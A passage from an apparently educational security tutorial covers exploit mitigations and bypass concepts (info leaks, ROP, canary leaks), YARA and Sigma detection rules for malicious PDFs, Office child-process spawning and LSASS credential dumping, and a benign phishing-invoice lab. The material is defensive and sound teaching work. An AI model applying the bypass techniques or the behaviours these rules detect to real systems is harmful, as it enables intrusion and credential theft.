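print(f"chance of evading all layers: {p_evade:.2%}")
```

With these made-up numbers, three individually imperfect layers leave the attacker a 6% chance of getting through all of them. In practice layers are correlated (an attacker who evades one EDR rule often evades related ones), so the real figure is usually less favorable than the independent estimate.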
Modern operating systems deploy multiple hardware and software mitigations that make exploitation dramatically harder. Understanding how each one works — and how attackers bypass them — is essential for both offense and defense.
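What it does: ASLR (Address Space Layout Randomization) randomizes the base address of the executable, DLLs, stack, and heap so that an exploit cannot rely on fixed addresses. A DLL that loaded at 0x7FFE0000 last time might load at 0x7FF30000 next time. On Windows, system DLL bases are typically re-randomized at boot rather than on every process start, while stack and heap locations change per process.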
What it prevents: Hardcoded addresses in exploits. The heap spray target 0x0c0c0c0c and ROP gadget addresses become unpredictable.
Bypass: Information leaks — if the attacker can read a pointer from memory (e.g., via a format string bug or type confusion), they learn the DLL base and calculate all gadget offsets from it.
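The reason a single leaked pointer undoes ASLR is plain arithmetic: offsets inside a module stay fixed even when its base moves. A worked sketch with hypothetical numbers follows (the offsets are invented; the base matches the example address used above).

```python
def module_base(leaked_pointer: int, known_offset: int) -> int:
    """Recover a module base from one leaked pointer into that module."""
    base = leaked_pointer - known_offset
    # Windows maps images on 64 KiB boundaries, so a misaligned result
    # means the assumed offset was wrong.
    if base & 0xFFFF:
        raise ValueError(f"base {base:#x} is not 64 KiB aligned")
    return base


# Hypothetical values: a pointer leaked at runtime, and the offset of that
# same symbol taken from the DLL file on disk.
leaked = 0x7FF31A2C
symbol_offset = 0x1A2C
other_offset = 0x4F10  # offset of some other code location in the same DLL

base = module_base(leaked, symbol_offset)
other_address = base + other_offset

print(f"base = {base:#x}, other location = {other_address:#x}")
```

This is why defenders treat any pointer disclosure as serious even when it looks harmless on its own: it converts every address in that module from unknown to known.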
What it does: DEP (Data Execution Prevention, built on the hardware NX bit) marks memory pages as either writable OR executable, never both. The stack and heap are writable but NOT executable. Code sections are executable but NOT writable.
What it prevents: Classic shellcode injection. Even if you overflow a buffer and place shellcode on the stack, the CPU refuses to execute it (hardware NX bit on every page table entry).
Bypass: ROP (Return-Oriented Programming) — chain together existing code "gadgets" (small instruction sequences ending in ret) from executable DLLs. Or call VirtualProtect() via ROP to mark the shellcode page as executable.
What it does: The compiler inserts a random value (the "canary") between local variables and the saved return address on the stack. Before the function returns, it checks if the canary is still intact.
What it prevents: Sequential buffer overflows that overwrite the saved EIP/RIP. The overflow corrupts the canary before reaching the return address → detected → process terminates safely.
Bypass: Information leak to read the canary value, then include it in the overflow payload. Or use a write-what-where primitive that skips over the canary (e.g., indexed array out-of-bounds).
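The canary check can be modeled with a toy stack frame. This is a simulation in Python, not real stack memory: the layout, sizes, and return address are assumptions chosen to mirror the description above.

```python
import os

BUF_SIZE = 16      # bytes reserved for the local buffer
CANARY_SIZE = 8    # bytes of random canary
RETURN_ADDRESS = 0x401000  # hypothetical saved return address


class Frame:
    """Toy stack frame laid out as [buffer][canary][saved return address]."""

    def __init__(self) -> None:
        self.canary = os.urandom(CANARY_SIZE)
        self.memory = (
            bytearray(BUF_SIZE) + self.canary + RETURN_ADDRESS.to_bytes(8, "little")
        )

    def unchecked_copy(self, data: bytes) -> None:
        """Copy into the buffer with no length check, like an unsafe strcpy."""
        n = min(len(data), len(self.memory))
        self.memory[:n] = data[:n]

    def canary_intact(self) -> bool:
        """The check the compiler inserts before the function returns."""
        stored = bytes(self.memory[BUF_SIZE:BUF_SIZE + CANARY_SIZE])
        return stored == self.canary

    def return_address(self) -> int:
        return int.from_bytes(self.memory[-8:], "little")


safe = Frame()
safe.unchecked_copy(b"A" * BUF_SIZE)   # fits exactly, canary untouched

smashed = Frame()
smashed.unchecked_copy(b"A" * 32)      # runs through canary and return address

print(safe.canary_intact(), hex(safe.return_address()))
print(smashed.canary_intact(), hex(smashed.return_address()))
```

The sequential overflow cannot reach the return address without passing through the canary first, which is exactly why the bypasses listed above either learn the canary value or write past it without touching it.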
What it does: CFG (Windows) validates indirect call targets against a bitmap of valid function entry points at runtime. CET (Intel hardware) maintains a shadow stack that the attacker can't overwrite — the hardware compares the shadow stack return address with the actual return address.
What it prevents: CFG blocks calling arbitrary addresses via hijacked function pointers. CET blocks ROP chains because the shadow stack detects modified return addresses.
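Bypass: CFG: call a valid function that itself is dangerous (e.g., ntdll!NtContinue to pivot execution context). CET: hardware shadow stacks are still relatively recent (Intel 11th Gen and AMD Zen 3 onward, with OS support in recent Windows 10 builds and Windows 11), and comparatively little bypass research has been published so far.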
YARA is the industry standard for pattern-matching malicious files. These rules scan PDFs, Office documents, and memory dumps for known exploit patterns. Every SOC should deploy YARA on email gateways, file shares, and EDR agents.
rule PDF_Suspicious_JavaScript {
    meta:
        description = "Detects PDF files with embedded JavaScript (potential exploit)"
        author = "SOC Analyst Playbook"
        severity = "medium"
    strings:
        $pdf_magic = "%PDF-"
        $js_action = "/OpenAction" nocase
        $js_tag = "/JavaScript" nocase
        $js_tag2 = "/JS" nocase
        $aa = "/AA" nocase          // Additional Actions
        $launch = "/Launch" nocase  // Launch action (runs executables)
    condition:
        $pdf_magic at 0 and ($js_action or $aa) and ($js_tag or $js_tag2 or $launch)
}
rule PDF_HeapSpray_Shellcode {
    meta:
        description = "Detects heap spray NOP sled patterns in PDF JavaScript"
        author = "SOC Analyst Playbook"
        severity = "critical"
    strings:
        $pdf_magic = "%PDF-"
        $nop_uni = "%u0c0c%u0c0c"                     // Classic NOP sled in unicode escape
        $nop_uni2 = "%u9090%u9090"                    // x86 NOP NOP as unicode
        $nop_hex = "\\x0c\\x0c\\x0c\\x0c"             // Hex-escaped NOP sled
        $substr = "substr(" nocase                    // String slicing (shellcode construction)
        $unescape = "unescape(" nocase                // Unicode decode (shellcode delivery)
        $collab = "Collab" nocase                     // Collab.collectEmailInfo exploit trigger
        $spell = "spell.customDictionaryOpen" nocase  // Spell check exploit
    condition:
        $pdf_magic at 0 and (any of ($nop_*)) and (any of ($substr, $unescape, $collab, $spell))
}
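rule Office_Remote_Template_Injection {
    meta:
        description = "Detects Office docs loading remote templates (CVE-2021-40444 pattern)"
        severity = "high"
    // Note: .docx files are ZIP archives whose parts are usually compressed, so
    // run this rule against the extracted .rels XML rather than the raw container.
    // Ordinary hyperlinks are also stored as external relationships, so expect
    // matches on benign documents and review the relationship type.
    strings:
        $rels_xml = "word/_rels/" nocase
        $target_ext = /Target\s*=\s*"https?:\/\/[^"]{10,}"/ nocase
        $target_mode = "TargetMode=\"External\"" nocase
    condition:
        all of them
}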
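Because Office Open XML files are ZIP containers, relationship data is normally compressed inside the archive and is easier to inspect after unpacking. The sketch below is one way to do that with Python's standard library; the function name, the regexes, and the sample document built in memory are all illustrative assumptions, not part of any existing tool.

```python
import io
import re
import zipfile

RELATIONSHIP = re.compile(rb"<Relationship\b[^>]*>", re.IGNORECASE)
TARGET = re.compile(rb'\sTarget\s*=\s*"(https?://[^"]+)"', re.IGNORECASE)
REL_TYPE = re.compile(rb'\sType\s*=\s*"([^"]*)"', re.IGNORECASE)
EXTERNAL = re.compile(rb'\sTargetMode\s*=\s*"External"', re.IGNORECASE)


def external_relationships(docx_bytes: bytes) -> list:
    """Return (relationship type, URL) pairs for external http(s) targets."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(".rels"):
                continue
            for element in RELATIONSHIP.findall(archive.read(name)):
                target = TARGET.search(element)
                if not target or not EXTERNAL.search(element):
                    continue
                rel_type = REL_TYPE.search(element)
                kind = rel_type.group(1).decode().rsplit("/", 1)[-1] if rel_type else "?"
                found.append((kind, target.group(1).decode("ascii", "replace")))
    return found


# Build a tiny stand-in archive in memory (not a complete, openable .docx).
BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
rels = (
    "<Relationships>"
    f'<Relationship Id="rId1" Type="{BASE}attachedTemplate" '
    'Target="http://example.test/template.dotm" TargetMode="External"/>'
    f'<Relationship Id="rId2" Type="{BASE}hyperlink" '
    'Target="https://example.test/" TargetMode="External"/>'
    "</Relationships>"
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
    archive.writestr("word/_rels/settings.xml.rels", rels)

found = external_relationships(buffer.getvalue())
# Hyperlinks are routine; other external relationship types deserve a look.
worth_review = [item for item in found if item[0] != "hyperlink"]
print(worth_review)
```

Reporting the relationship type alongside the URL lets an analyst separate everyday hyperlinks from remotely loaded templates or objects.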
Sigma rules are the YARA equivalent for log data — they define detection logic that translates to SIEM queries (Splunk SPL, Elastic KQL, Microsoft Sentinel KQL). Deploy these to catch exploit post-exploitation behavior in your environment.
title: Office Application Spawning Suspicious Child Process
id: 5c5e13a2-df44-414c-b7f0-a1cc4f2e8b7d
status: stable
level: high
description: |
    Detects Microsoft Office applications spawning cmd.exe, powershell.exe,
    mshta.exe, or other living-off-the-land binaries. This is a strong indicator
    of document-based exploitation (macros, DDE, OLE, Follina).
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WINWORD.EXE'
            - '\EXCEL.EXE'
            - '\POWERPNT.EXE'
            - '\OUTLOOK.EXE'
            - '\MSACCESS.EXE'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\mshta.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
            - '\msdt.exe'  # Follina (CVE-2022-30190)
            - '\rundll32.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate Office add-ins that spawn helper processes
    - IT automation scripts triggered by Office macros
tags:
    - attack.execution
    - attack.t1204.002  # User Execution: Malicious File
    - attack.t1059.001  # PowerShell
    - attack.t1218.005  # Mshta
---
title: LSASS Memory Access by Non-System Process
id: 0d894093-71bc-43c3-8985-a84f8fa4a09f
status: stable
level: critical
description: |
    Detects processes accessing LSASS memory, a key indicator of credential
    dumping (Mimikatz, procdump, nanodump). This is Step 5 in our attack chain:
    privilege escalation + credential theft.
logsource:
    category: process_access
    product: windows
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        GrantedAccess|contains:
            - '0x1010'    # PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ
            - '0x1410'    # + PROCESS_QUERY_INFORMATION
            - '0x1438'    # + PROCESS_VM_WRITE + PROCESS_VM_OPERATION
            - '0x1F0FFF'  # PROCESS_ALL_ACCESS (pre-Vista value)
            - '0x1FFFFF'  # PROCESS_ALL_ACCESS (Vista and later)
    filter_system:
        SourceImage|endswith:
            - '\lsass.exe'
            - '\csrss.exe'
            - '\svchost.exe'
            - '\MsMpEng.exe'  # Defender
    condition: selection and not filter_system
falsepositives:
    - AV/EDR products accessing LSASS for protection
    - Crash dump utilities (WerFault.exe)
tags:
    - attack.credential_access
    - attack.t1003.001  # OS Credential Dumping: LSASS Memory
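GrantedAccess values are bitmasks, so it helps to decode them into named rights when tuning the LSASS rule. The sketch below uses the process-specific access right values from the Windows SDK; the function name and output format are illustrative choices.

```python
# Process-specific access rights (low 13 bits of the access mask).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
KNOWN_BITS = sum(PROCESS_RIGHTS)


def decode_access(mask) -> list:
    """Turn a GrantedAccess value (hex string or int) into right names."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]
    leftover = value & ~KNOWN_BITS
    if leftover:
        # Standard rights such as READ_CONTROL or SYNCHRONIZE live up here.
        names.append(f"other bits 0x{leftover:X}")
    return names


for sample in ("0x1010", "0x1410", "0x1438"):
    print(sample, decode_access(sample))
```

Whatever the exact mask, the right that matters for credential dumping is PROCESS_VM_READ: a handle without it cannot read LSASS memory.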
Test your understanding of the exploit concepts covered in this tutorial. Each question maps to a specific section — review the section if you get it wrong.
Q1. In a heap spray attack targeting 32-bit Adobe Reader, why is 0x0c0c0c0c commonly used as the target address? (Section 02 — Hacker Math)
Q2. What makes FORCEDENTRY (CVE-2021-30860) a "zero-click" exploit? (Section 03 — Zero-Click)
Q3. What is the purpose of a stack canary? (Section 10 — Defense)
Q4. In the MITRE ATT&CK framework, what technique ID corresponds to "Spearphishing Attachment"? (Section 06 — Attack Chain)
Q5. How does ROP (Return-Oriented Programming) bypass DEP? (Section 07 — Exploit Craft)
Q6. What does the Sigma rule for "Office Spawning Suspicious Processes" specifically detect? (Section 10 — Defense)
Q7. Why do MotW bypass attacks use ISO/IMG container files? (Section 04 — Doc Exploits)
Q8. What is the key difference between little-endian and big-endian byte order in exploit development? (Section 02 — Hacker Math)
Every tool a threat hunter needs in one place. Convert data between formats, encode and decode payloads, hash strings, analyze hex dumps — all client-side, nothing leaves your browser. Use the copy button on any output to grab results for your analysis workflow.
Convert text to hexadecimal bytes and back. Essential for reading shellcode, analyzing packet captures, and decoding obfuscated strings found in malware.
Base64 is everywhere: email attachments, JWT tokens, PowerShell encoded commands (-EncodedCommand), data URIs, and obfuscated malware payloads. Attackers love it because it turns binary into text that survives transport.
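PowerShell's -EncodedCommand takes Base64 over UTF-16LE text, which is why decoding it as UTF-8 produces a NUL after every ASCII character. A minimal decoding sketch follows; the sample command is harmless and made up for the demonstration.

```python
import base64


def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE)."""
    raw = base64.b64decode(b64_text, validate=True)
    return raw.decode("utf-16-le")


def encode_command(command: str) -> str:
    """Inverse helper, used here only to build a sample for the demo."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


sample = encode_command("Write-Output 'hello'")
decoded = decode_encoded_command(sample)
print(sample)
print(decoded)
```

Passing `validate=True` makes the decoder reject characters outside the Base64 alphabet instead of silently skipping them, which is useful when the input may be truncated or padded with junk.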
URL encoding converts special characters to %XX hex pairs. Used in web exploits (XSS, SQLi, SSRF), phishing URL obfuscation, and C2 communication over HTTP. Essential for analyzing web application attacks.
Convert between text and JavaScript unicode escapes (%uXXXX), hex escapes (\xXX), and HTML entities (&#xXX;). These formats are used in heap spray shellcode, XSS payloads, and obfuscated JavaScript.
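When reading heap spray JavaScript, the useful step is turning %uXXXX escapes back into the bytes they become in memory. Each escape is one 16-bit code unit, stored little-endian on x86, so the two bytes appear swapped relative to how they are written. A small sketch, handling only the %uXXXX form:

```python
import re

PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def percent_u_to_bytes(text: str) -> bytes:
    """Convert every %uXXXX escape in text to its little-endian byte pair."""
    return b"".join(
        int(code, 16).to_bytes(2, "little") for code in PERCENT_U.findall(text)
    )


sled = percent_u_to_bytes("%u9090%u9090")
swapped = percent_u_to_bytes("%u4241")   # written as 42 41, stored as 41 42

print(sled.hex(" "))
print(swapped.hex(" "), swapped)
```

The byte swap is the detail that most often trips up manual decoding: `%u4241` lands in memory as `41 42`, which is the ASCII text `AB`.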
Generate cryptographic hashes for threat intel IOC lookups, file integrity checks, and malware sample identification. Paste a string and see all common hash formats instantly. Compare against VirusTotal, MISP, or your SIEM.
Simple substitution cipher used in CTF challenges, obfuscated scripts, and quick payload hiding. Adjust the rotation value (ROT-13 is the default, ROT-47 covers ASCII printable). Some malware uses cascading ROT to avoid static signatures.
XOR is one of the most common obfuscation techniques in malware. Shellcode XOR'd with a single-byte key can evade static signature detection. Enter data and a key, and the tool shows the XOR'd output in hex. XOR is its own inverse: apply the same key again to decode.
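Because a single-byte key has only 256 possibilities, an analyst can simply try them all and keep the ones whose output contains an expected string. The sketch below shows both the self-inverse property and that brute-force search; the sample data and the search string are made up.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def candidate_keys(data: bytes, expected: bytes) -> list:
    """Return every single-byte key whose decoding contains expected."""
    return [key for key in range(256) if expected in xor_bytes(data, key)]


plain = b"http://example.test/payload"
encoded = xor_bytes(plain, 0x5A)

print(encoded.hex())
print(xor_bytes(encoded, 0x5A))           # same key again restores the input
print([hex(k) for k in candidate_keys(encoded, b"http")])
```

Searching for a short known fragment such as `http`, `MZ`, or `This program` is usually enough to recover the key without any knowledge of the malware itself.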
Convert between binary (base-2), decimal, hex, and ASCII text. Useful for analyzing bit flags, permission masks, network protocol fields, and understanding low-level CPU operations.
Paste any text and see a full hex dump with offsets, hex bytes, and ASCII representation — the same format you see in hex editors (HxD, xxd, hexdump). Essential for binary analysis, memory forensics, and packet inspection.
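The classic three-column layout is straightforward to reproduce. The sketch below is a minimal formatter in the general style of `xxd` or `hexdump -C`; exact spacing differs between tools, and this version makes no attempt to match any one of them byte for byte.

```python
def hexdump(data: bytes, width: int = 16) -> str:
    """Format data as offset, hex bytes, and printable ASCII per line."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{byte:02x}" for byte in chunk)
        # Non-printable bytes are shown as dots, as hex editors do.
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:08x}  {hex_part:<{width * 3 - 1}}  |{ascii_part}|")
    return "\n".join(lines)


dump = hexdump(b"%PDF-1.7\n")
print(dump)
print(hexdump(bytes(range(20))))
```

Padding the hex column to a fixed width keeps the ASCII column aligned on the final, shorter line.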
Decode JSON Web Tokens without sending them to any external service. See the header, payload, and signature. Useful for API security testing, OAuth debugging, and verifying token claims during pentests.
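A JWT is three Base64url segments joined by dots, so decoding one locally needs only the standard library. The sketch below reads the header and payload without verifying the signature; the token is built in place from made-up claims and a placeholder signature.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode Base64url, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    """Encode to unpadded Base64url (used only to build the sample)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token: str) -> dict:
    """Split a JWT and decode its parts. Does NOT verify the signature."""
    header, payload, signature = token.split(".")
    return {
        "header": json.loads(b64url_decode(header)),
        "payload": json.loads(b64url_decode(payload)),
        "signature_hex": b64url_decode(signature).hex(),
    }


# Sample token with invented claims and a placeholder signature.
sample = ".".join([
    b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    b64url_encode(json.dumps({"sub": "analyst", "admin": False}).encode()),
    b64url_encode(b"not-a-real-signature"),
])
decoded = decode_jwt(sample)
print(json.dumps(decoded, indent=2))
```

Decoding is not validation: anyone can read or forge these segments, so claims should only be trusted after the signature has been checked with the issuer's key.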
Social engineering is the #1 initial access vector. Attackers don't just send malware — they send convincing documents. An invoice PDF from a "vendor" is far more likely to be clicked than a random attachment. In this lab, you'll generate a real professional invoice PDF and study what separates it from a weaponized one.
Fill in the invoice details below. The generated PDF will contain a visible download link — just like a real phishing document would. The link points to whatever URL you specify (e.g., the official PuTTY download). Everything runs client-side.
pdfid or pdf-parser — what objects do you see?
Your generated invoice is completely benign. Here's exactly what separates it from a real weaponized phishing PDF — and why understanding the difference matters for threat hunting.
Only a /URI annotation: a normal clickable hyperlink. The user sees it, clicks it voluntarily, and the browser navigates.
No /JavaScript or /JS entries in the PDF object tree.
No /OpenAction or /AA (Additional Actions). Nothing executes when the PDF is opened.
No embedded files (/EmbeddedFile), no file attachments, no embedded executables.
A weaponized PDF, by contrast, can use a /Launch action to execute a command when clicked, running cmd.exe, PowerShell, or an embedded EXE directly.
When you run pdfid on your generated invoice, here's what it reports vs. what a malicious PDF would show:
Your generated invoice:
/Page 1
/URI 1
/Action 1
/JavaScript 0 ← clean
/JS 0 ← clean
/OpenAction 0 ← clean
/Launch 0 ← clean
/EmbeddedFile 0 ← clean
/AcroForm 0 ← clean
/XFA 0 ← clean
/Encrypt 0
/ObjStm 0
A malicious PDF:
/Page 1
/URI 0
/Action 3 ← suspicious
/JavaScript 2 ← 🚩 ALERT
/JS 2 ← 🚩 ALERT
/OpenAction 1 ← 🚩 auto-exec
/Launch 1 ← 🚩 cmd exec
/EmbeddedFile 1 ← 🚩 payload
/AcroForm 1 ← 🚩 forms
/XFA 0
/Encrypt 1 ← hides content
/ObjStm 3 ← compressed objs
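The keyword counts above can be approximated with a short script, which helps show what this kind of triage actually measures. This is a simplified sketch, not a reimplementation of pdfid: it scans raw bytes only, so it misses names hidden inside compressed object streams or obfuscated with hex escapes. The sample document is a hand-written fragment, not a valid PDF.

```python
import re

KEYWORDS = [
    "/Page", "/URI", "/Action", "/JavaScript", "/JS", "/OpenAction",
    "/Launch", "/EmbeddedFile", "/AcroForm", "/XFA", "/Encrypt", "/ObjStm",
]


def count_keywords(pdf_bytes: bytes) -> dict:
    """Count occurrences of each PDF name as a whole token."""
    counts = {}
    for keyword in KEYWORDS:
        # The lookahead stops /Page from also matching /Pages.
        pattern = re.compile(re.escape(keyword.encode()) + rb"(?![A-Za-z0-9])")
        counts[keyword] = len(pattern.findall(pdf_bytes))
    return counts


# Hand-written fragment for illustration only.
sample = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n"
)
counts = count_keywords(sample)
flagged = {name: n for name, n in counts.items() if n}
print(flagged)
```

A non-zero count for /OpenAction together with /JavaScript or /JS is the combination worth escalating; either one alone is weaker evidence.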
Use this checklist when analyzing suspicious PDFs during incident response or threat hunting. Each flag is mapped to the MITRE ATT&CK framework.
"OVERDUE", "FINAL NOTICE", "Act within 24 hours" — social pressure to bypass critical thinking.
T1566.001 - Spearphishing Attachment
Invoice from "CloudSync Technologies" but the email is from billing@cl0udsync-tech.com, a typosquatting domain.
"Download the secure client": legitimate invoices never ask you to install software. This is the #1 social engineering trigger.
T1204.002 - User Execution: Malicious File
PDFs containing JavaScript are almost always malicious in a corporate context. Legitimate invoices have zero need for JS.
T1059.007 - Command and Scripting Interpreter: JavaScript
Auto-execute on open: the PDF does something the instant it's rendered, with no further interaction once the file has been opened.
T1203 - Exploitation for Client Execution
Can directly invoke system commands. A PDF calling cmd.exe or powershell.exe is a definitive IOC.
/EmbeddedFile streams containing executables, scripts, or Office documents with macros: payload delivery inside the PDF.
Multiple filter chains (FlateDecode + ASCIIHexDecode + ASCII85Decode) stacked to hide content from static scanners.
T1027 - Obfuscated Files or Information
Links going through bit.ly, tinyurl, or multi-hop redirects to obscure the final destination. Legitimate invoices use direct corporate URLs.
T1608.005 - Link Target
Did the recipient expect this invoice? Unsolicited financial documents are the most common phishing vector in enterprise environments.
T1566.001 - Spearphishing Attachment
Understanding detection helps you appreciate both sides: what attackers try to evade and what defenders rely on. Here's how each layer of the security stack handles PDF threats.
Static Analysis: Scans PDF structure for /JavaScript, /Launch, /OpenAction, /EmbeddedFile keywords. Your lab PDF passes this — it only has /URI.
URL Reputation: Extracts all URLs and checks against threat intel feeds. A link to putty.org is clean; a link to putty-secure[.]download would be flagged.
Sandbox Detonation: Opens the PDF in a headless VM, watches for process spawning, network callbacks, file drops. Your PDF just renders text — nothing detonates.
Process Chain: Monitors if PDF reader spawns child processes (cmd.exe, powershell.exe, mshta.exe). Your PDF opens a browser — normal behavior for URI clicks.
Behavioral Rules: YARA rules flag PDFs calling WinExec, ShellExecute, or containing ROP gadgets. Your PDF has none of these.
Memory Scanning: Detects heap sprays (NOP sleds in streams), shellcode patterns, and exploit signatures at runtime.
pdfid.py: Quick triage — counts suspicious keywords. Zero /JS, /Launch, /OpenAction = low risk. Try it on your generated PDF!
pdf-parser.py: Deep dive — dumps every object, decodes streams, follows references. Shows the full object tree.
peepdf: Interactive analysis — JavaScript extraction, shellcode detection, object graph visualization.
Online Sandboxes: Upload to any.run, hybrid-analysis.com, or VirusTotal to see multi-engine detection results.
No executable code: Zero JavaScript, no embedded executables, no launch actions.
Transparent link: A visible /URI pointing to a known-good domain. Users choose to click; nothing auto-executes.
Clean structure: Minimal PDF objects — page, font, text streams, one annotation. No obfuscation, no encoded streams hiding payloads.
Social engineering only: The "attack" is the convincing design and the call-to-action. This is why human awareness training is essential — technology can't flag a well-crafted invoice with a legitimate link.
Quick reference for every technical term used in this tutorial. Terms are grouped by category. Use Ctrl+F to search for a specific term.
0x90) instructions that act as a "landing pad": execution slides through until it reaches the shellcode.
0xDEADBEEF → EF BE AD DE in memory.
Primary sources, research papers, and recommended resources for deeper study. Every claim in this tutorial can be traced to these references.